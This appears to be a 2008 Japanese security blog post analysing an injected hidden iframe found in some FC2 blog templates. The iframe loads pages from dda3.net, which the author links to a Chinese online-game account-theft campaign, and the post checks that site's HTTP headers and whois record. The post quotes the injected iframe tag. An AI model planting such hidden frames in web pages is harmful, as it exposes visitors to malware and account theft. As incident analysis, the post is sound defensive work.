ハルコタン紀行

dda3.netその1

いくつかのFC2ブログのテンプレートにiframe(インラインフレーム)が仕掛けられていたそうです。
<iframe src="http://www.dda3.net/"></iframe>
実際には大きさ0(width="0" height="0")の指定もあります(ブラウザで表示されない)が省略します。

いつものオンラインゲームの中国製アカウントハックです。
iframeで以下の2つのフレームを呼び出します。
http://www.dda3.net/index.htm
http://www.dda3.net/he.htm
indexがindexを呼んで再帰に陥っているように見えますが、ディレクトリにアクセスした場合にどのファイルを表示するか(あるいはファイル一覧を表示するか403を返すか)はWebサーバ(ApacheやIISなど)の設定次第です。
HTTPヘッダによると
Content-Location:http://www.dda3.net/Default.htm
となっていて、Default.htmがindex.htmとhe.htmを呼び出しています。
そもそもDefault.htmはMicrosoftのIIS(Windowsに付属)のデフォルトとなっています。
HTTPヘッダによると
Server:Microsoft-IIS/6.0
とWindowsServer2003をお使いのようです。

ちなみにwhoisすると
Creation Date:2008-02-26
Country:China
となっており、このアカウントハックのためだけに登録したドメインのようです。
ドメインの登録は無料ではありませんが、RMTのためのささやかな投資です。
根本的な原因はRMTです。

続きます。

メモ:
HTTPヘッダ ブラウザもHTTPヘッダで通信しているぞ! Googleで調べてみよう!
whois ドメインの情報を調べることができるぞ! Googleで(略)

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/13(木) 23:00:34|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0
<<hellh.netその1 | ホーム | FFXI>>

コメント

コメントの投稿


管理者にだけ表示を許可する

トラックバック

トラックバック URL
http://ilion.blog47.fc2.com/tb.php/3-7cf14b0e
この記事にトラックバックする(FC2ブログユーザー)